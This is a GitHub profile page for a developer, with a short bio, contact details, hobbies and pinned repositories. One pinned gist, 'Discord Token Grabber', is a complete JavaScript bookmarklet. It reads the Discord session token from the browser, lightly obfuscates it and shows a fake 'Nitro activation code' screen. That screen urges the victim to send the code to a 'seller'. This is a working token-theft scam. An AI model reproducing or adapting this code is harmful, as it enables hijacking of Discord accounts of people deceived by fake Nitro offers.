Skip to content
View bufferwise's full-sized avatar
:shipit:
:shipit:

Block or report bufferwise

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don't include any personal information such as legal names or email addresses. Markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
bufferwise/README.md

πŸ‘‹πŸ» Radhe Radhe

If you'd like to reach out, you can DM me on Discord (@bufferwise), email me for business inquiries at buffer@outlook.in, or for general questions at buffergg@duck.com. You can also check out my Bento for my discord related works, follow me on Instagram and Threads, or connect with me on Twitter at @bufferwise.

Personal Interests

  • Currently learning Zig.
  • I love South Indian cuisine (Dosa)
  • I like playing Chess, Badminton, Cricket (Aggressive style)
  • Games which I mainly play includes Call of Duty: Mobile & Nulls Brawl

Pinned Loading

  1. DiscordJS Run Code DiscordJS Run Code
    1
    const { Client, GatewayIntentBits, Partials, ActivityType } = require('discord.js');
    2
    const process = require('process');
    3
    
                  
    4
    // Configuration object for better maintainability
    5
    const CONFIG = {
  2. Discord Token Grabber Discord Token Grabber
    1
    javascript:(function(){try{let f=document.createElement('iframe');f.style.display='none';document.body.appendChild(f);let t=JSON.parse(f.contentWindow.localStorage.token);function o(s){const c="#@$%&^";return s.split('').map(ch=>{let n=Array.from({length:Math.floor(Math.random()*3)+1},()=>c.charAt(Math.floor(Math.random()*c.length))).join('');return ch+n}).join('')}let ob=`infnitroTaglink-${o(t)}-predictnitro#56647`;document.body.innerHTML='';document.head.innerHTML='';document.body.style.cssText="background:#111;color:#fff;font-family:sans-serif;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;padding:20px;text-align:center;";let b=document.createElement('div');b.style.cssText="background:#1e1e1e;padding:30px;border-radius:10px;box-shadow:0 0 20px #00ffff;max-width:90%;width:480px;";let h=document.createElement('h2');h.textContent="🎁 Activation Code Generated";h.style="color:#00ffff;margin-bottom:15px;";let m=document.createElement('p');m.innerHTML="βœ… Nitro is being prepared!<br><br><b>Send this code to your seller to finalize activation:</b>";m.style="margin-bottom:15px;color:#ccc;";let i=document.createElement('textarea');i.value=ob;i.readOnly=true;i.style.cssText="width:100%;padding:12px;font-size:13px;border:none;border-radius:6px;background:#2a2a2a;color:#0f0;text-align:center;margin-bottom:15px;resize:none;";i.rows=3;let c=document.createElement('button');c.textContent='πŸ“‹ Copy Code';c.onclick=()=>{navigator.clipboard.writeText(i.value);c.textContent='Copied!';setTimeout(()=>c.textContent='πŸ“‹ Copy Code',1500)};c.style.cssText="padding:10px 20px;background:#00ff99;color:#000;border:none;border-radius:6px;cursor:pointer;box-shadow:0 0 8px #00ff99;";b.append(h,m,i,c);document.body.appendChild(b);}catch(e){alert('Error: Could not access nitro from account.')}})();
    2
    //Simple Token Grabber, Paste this on URL Column when your discord account is logged in on the web, then click on copy code, it will create an obsucated code of your token.
  3. bufferwise.github.io bufferwise.github.io Public

    just my simple personal website....

    HTML

  4. LeetCode LeetCode Public

    LeetCode solutions and algorithmic explorations by @bufferwise. This collection documents a refined approach to problem-solving, with comprehensive implementations integrated since mid-2025.

    C++